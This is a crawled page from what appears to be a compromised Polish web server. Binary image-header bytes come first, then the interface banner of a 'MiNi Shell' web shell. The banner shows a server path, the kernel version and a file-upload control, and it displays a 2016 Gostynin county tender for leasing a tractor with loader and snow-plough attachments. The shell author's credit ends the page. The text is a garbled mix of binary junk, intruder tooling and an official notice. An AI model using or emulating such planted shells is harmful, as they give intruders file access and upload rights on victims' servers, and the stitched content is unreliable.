JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160609/77279-N-2016.html

<p class="kh_header"><b>Gostynin: Dostawa  w ramach leasingu operacyjnego fabrycznie nowego 
ciągnika rolniczego wraz z osprzętem oraz jego ubezpieczenie na czas trwania leasingu w zakresie OC, AC, NNW</b><br>
<b>Numer ogłoszenia: 77279 - 2016; data zamieszczenia: 09.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gostyniński , ul. Dmowskiego 13, 09-500 Gostynin, woj. mazowieckie, tel. 024 2357981, faks 024 2357985.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  w ramach leasingu operacyjnego fabrycznie nowego 
ciągnika rolniczego wraz z osprzętem oraz jego ubezpieczenie na czas trwania leasingu w zakresie OC, AC, NNW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa fabrycznie nowego ciągnika rolniczego rok produkcji min. 2015wraz z osprzętem oraz jego ubezpieczenie  w ramach leasingu operacyjnego za stałe raty leasingowe w okresie 48 miesięcy z opcją wykupu.
Okres leasingu 48 miesięcy
 
Przedmiot zamówienia winien spełniać nw parametry techniczne
Ciągnik rolniczy

Silnik czterocylindrowy, wysokoprężny, turbodoładowany, spełniający normy emisyjności spalin minimum ETAP IIIA.
Pojemność skokowa silnika do 3200 cm3.
Moc silnika od 75 do 90 KM 
System chłodzenia silnika cieczą.
Skrzynia biegów mechaniczna, synchronizowana z przekładnią nawrotową i reduktorem biegów
Liczba biegów min. 12 do przodu i 12 do tyłu. 
Napęd na wszystkie koła na dwie osie 4x4. Napęd kół przednich załączany
elektrohydraulicznie.
Blokada mechanizmu różnicowego elektrohydrauliczna.
Hydraulika zewnętrzna 2 szt. rozdzielaczy hydrauliki zewnętrznej: min 4 gniazda
hydrauliki zewnętrznej EURO.
Trójpunktowy układ zawieszenia TUZ przedni: przedni TUZ - 2 wyjścia
hydrauliki zewnętrznej z przodu ciągnika EURO.
Układ hamulcowy hamulce pneumatyczne do przyczep 1 i 2 obwodowe.
Sprzęgło mokre.
Układ kierowniczy  wspomaganie układu kierowniczego wymagane. 
Kabina klimatyzowana, ogrzewana z lusterkami zewnętrznymi, ilość miejsc
siedzących homologowanych 2 wymagane.
Oświetlenie drogowe przednie i tylne, zewnętrzne reflektory robocze przednie i tylne,  lampa ostrzegawcza kogut na dachu kabiny wymagane.
Spryskiwacz szyby przedniej wymagany.
Wycieraczki na przedniej i tylnej szybie: wymagane.
Obroty wału odbioru mocy tylnego: WOM 540 750 lub 540 540E obrotów min.
Gaśnica, apteczka i trójkąt ostrzegawczy: wymagane.
Ciągnik wyposażony w zaczep transportowy i zaczep rolniczy: wymagane
Ładowacz czołowy przedni wymagany z mocowaniem na euro ramkę udźwig ładowacza min. 2000kg
Osprzęt
 Łyżka uniwersalna
     szerokość 2200mm
      pojemność 0.7m3
      lemiesz czołowy ze stali trudnościeralnej
     mocowanie euro ramka
Widły do palet
     udźwig 2000kg
     widły 80/40/1200mm
     masa nie mniej niż 150kg
Pług odśnieżny strzałkowy łamany 
     szerokość maks. 2800mm
     wysokość maks. 1300mm
     waga maks. 650kg
     6 pozycji roboczych
     sterowanie hydrauliczne z kabiny za pomocą trzeciej sekcji
     amortyzacja lemiesza przedniego na sprężynach
      światła obrysowe
     koła podporowe
     lemiesz czołowy poliuretanowy 
     mocowanie euro ramka/tuz przedni
Ciągnik rolniczy musi posiadać:

niezbędną dokumentację tj. deklarację zgodności, instrukcje bezpiecznego stosowania, atesty i homologację dopuszczające do eksploatacji i ruchu drogowego, przeglądy techniczne dopuszczające do eksploatacji i ruchu drogowego, w tym m. in. dowód rejestracyjny,
książki serwisowe i karty gwarancyjne wydane przez producenta;
dokumenty gwarancyjne określające warunki serwisowania, 
instrukcje eksploatacji oraz wykaz części zamiennych.
Ponadto przedmiot zamówienia w dniu przekazania powinien być gotowy do eksploatacji tj.:
posiadać zdolność sprzęgania i pracy ciągnika z osprzętem;
posiadać stany płynów eksploatacyjnych w wymaganym przez producenta poziomie;
posiadać podstawowe narzędzia do eksploatacji.
Dokumenty określone w pkt. 3.5 należy dostarczyć wraz z przedmiotem zamówienia.

 Wymagania dodatkowe:

Wykonawca udzieli gwarancji na przedmiot zamówienia na minimum 24 m-ce bez
limitu motogodzin. Okres gwarancji liczony będzie od daty sporządzenia
bezusterkowego protokołu zdawczo odbiorczego przedmiotu zamówienia.
Przeglądy gwarancyjne bezpłatne odbywać się będą zgodnie z harmonogramem
wynikającym z warunków udzielonej przez producenta gwarancji, na wniosek
Zamawiającego.
W okresie gwarancyjnym Wykonawca zapewni przyjazd serwisu w terminie do  24 godzin od chwili  zgłoszenia usterki  przez Zamawiającego faksem, e-mailem z zastrzeżeniem, że zgłoszone usterki  w piątek  mogą być usuwane od następującego  po nim dnia roboczego. Zaistniałe usterki w danym sprzęcie w okresie gwarancyjnym usuwane będą  przez Wykonawcę w terminie do 7 dni od daty zgłoszenia.
W przypadku opóźnienia w rozpoczęciu naprawy, tj. nie rozpoczęcia jej w ciągu 24
godzin od momentu  powiadomienia Wykonawcy o awarii lub dla awarii zgłoszonych w piątek  od następującego po nim dnia roboczego, Zamawiający wezwie
inny podmiot świadczący usługi z tego zakresu a koszty naprawy obciążą
Wykonawcę. Niedotrzymanie uzgodnionego terminu upoważnia Zamawiającego do  usunięcia  awarii na koszt Wykonawcy oraz naliczenia kar umownych w wysokości określonej w § 8 we wzorze umowy.
Wykonawca dostarczy przedmiot zamówienia do siedziby Zarządu Dróg Powiatowych w Gostyninie ul. Płocka 76 na własny koszt.
O dostawie przedmiotu zamówienia Wykonawca zobowiązany jest zawiadomić
pisemnie faxe-mail Zamawiającego, z co najmniej 1 dniowym wyprzedzeniem.
Odbiór  przekazanie ciągnika wraz z osprzętem nastąpi w siedzibie Zarządu Dróg Powiatowych w Gostyninie, ul. Płocka 76 w obecności upoważnionych pracowników Zamawiającego i Wykonawcy wraz z przekazaniem Zamawiającemu kompletu dokumentów ciągnika i 2 kompletów kluczyków.
Wykonawca zapewni na własny koszt szkolenie pracowników Zarządu Dróg Powiatowych w Gostyninie, ul. Płocka 76 w zakresie obsługi i eksploatacji dostarczonego przedmiotu zamówienia.
Pozostałe warunki, jakim ma odpowiadać przedmiot zamówienia zawarte są w
Polskich Normach lub PN przenoszących normy europejskie, bądź normach innych
państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy.

Wykonawca dokona rejestracji ciągnika.
Zamawiający poniesie koszt opłaty za rejestrację i podatek roczny od środków transportu na podstawie otrzymanej faktury wystawionej w trakcie trwania umowy leasingu. Cena ofertowa ma nie zawierać kosztów rejestracji i kosztów podatku od środków transportu.
Wykonawca ubezpieczy przedmiot umowy w zakresie OC, AC, NNW przez cały okres obowiązywania Umowy;
Wykonawca zobowiązuje się terminowo opłacać składki ubezpieczenia, zawierać umowy ubezpieczenia oraz przedstawiać Zamawiającemu dokumenty potwierdzające opłacenie składek ubezpieczenia oraz dokumenty potwierdzające zawarcie umów ubezpieczenia przedmiotu leasingu w kolejnych okresach w trakcie trwania umowy leasingu, co najmniej 5 dni przed upływem terminu wygaśnięcia uprzednio zawartych umów ubezpieczenia lub terminu płatności składek.

Wymagania dotyczące leasingu

Leasing operacyjny w rozumieniu ustawy o podatku dochodowym od osób
prawnych t.j. Dz. U. z 2014 r. poz. 851 z późn. zm..
W okresie leasingu Zamawiający uiści na rzecz Wykonawcy leasingodawcy47
miesięcznych równych rat leasingowych, licząc od protokolarnego odbioru bez
zastrzeżeń dostarczonego przedmiotu leasingu.
Raty leasingowe zostaną przedstawione w harmonogramie spłat jako równe w całym
okresie trwania umowy leasingu - płatność rat - do 26 każdego miesiąca, począwszy
od następnego miesiąca od dnia przekazania przedmiotu zamówienia.
Oprocentowanie stałe niezmienne w okresie obowiązywania umowy.
Opłata wstępna w wysokości 1% ceny netto nabycia przez Wykonawcę
leasingodawcę przedmiotu leasingu zostanie uiszczona w terminie 3 dni od podpisania umowy przez obie strony. Opłata wstępna zostanie uiszczona przelewem z konta
Zamawiającego.
Zamawiający zastrzega sobie prawo opcji zakupu przedmiotu leasingu za kwotę
w wysokości 30% wartości netto przedmiotu leasingu. Skorzystanie przez
Zamawiającego z prawa opcji zakupu nastąpi na podstawie odpowiednich
dokumentów przenoszących własność leasingu podpisanych przez Zamawiającego
i Wykonawcę za cenę wskazaną w ofercie. Zamawiający przed spłatą ostatniej raty
leasingowej zobowiązuje się złożyć oświadczenie o skorzystaniu z prawa zakupu
przedmiotu leasingu, a cenę zakupu ureguluje w ciągu 14 dni od otrzymania faktury.
Wykonawca leasingodawca jest zobowiązany do opracowania i przedłożenia w ofercie harmonogramu rat leasingowych na cały okres obowiązywania umowy, począwszy od następnego miesiąca od dnia przekazania przedmiotu zamówienia.
Odpisów amortyzacyjnych w okresie leasingu dokonuje Wykonawca
leasingodawca.
Wszystkie wskaźniki cenowe zawarte w harmonogramie muszą być podane
w złotych polskich z zaokrągleniem do dwóch miejsc po przecinku.

Ponadto
Zamawiający dopuszcza możliwość przedstawienia Ogólnych Warunków Umowy Leasingu stosowanych standardowo przez Finansującego, w zakresie nie sprzecznym z SIWZ i załącznikami do SIWZ.
Zamawiający dopuszcza możliwość wyrażenia zgody na cesje praw wynikających z umowy na Bank Finansującego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 16.70.00.00-2, 66.11.40.00-2, 66.51.41.10-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie jest przewidziane składanie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia załącznik nr. 2 do SIWZ. w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia w trybie art. 23 Pzp, oceniane będzie ich łączne spełnienie powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia załącznik nr. 2 do SIWZ.
w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie
niniejszego zamówienia w trybie art. 23 Pzp, oceniane będzie ich łączne spełnienie
powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia załącznik nr. 2 do SIWZ.w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia w trybie art. 23 PZP, oceniane będzie ich łączne spełnienie powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia załącznik nr. 2 do SIWZ.w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia w trybie art. 23 PZP, oceniane będzie ich łączne spełnienie powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia załącznik nr. 2 do SIWZ. w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia w trybie art. 23 PZP, oceniane będzie ich łączne spełnienie po wyższego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy - wypełniony zgodnie z załącznikiem nr 1 do SIWZ,
pełnomocnictwo, w przypadku gdy wykonawcy ubiegają się wspólnie o udzielenie zamówienia - oryginał lub notarialnie potwierdzony odpis takiego pełnomocnictwa
jeżeli dotyczy,
pełnomocnictwo dla osoby/osób podpisującej ofertę, załączniki i oświadczenia, jeżeli
uprawnienie tych osób nie wynika z innych dokumentów dołączonych do oferty
oryginał lub notarialnie potwierdzony odpis takiego pełnomocnictwa jeżeli dotyczy,
harmonogram rat leasingowych na cały okres realizacji przedmiotu zamówienia,
w przypadku wystąpienia podwykonawców zakres powierzonych im części
zamówienia jeżeli dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Termin gwarancji - 5</li>
<li>3 - Rocznik - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.gostynin.powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Gostyninie
ul. Dmowskiego 13
09-500 Gostynin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2016 godzina 10:00, miejsce: Starostwo Powiatowe w Gostyninie
ul. Dmowskiego 13
09-500 Gostynin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com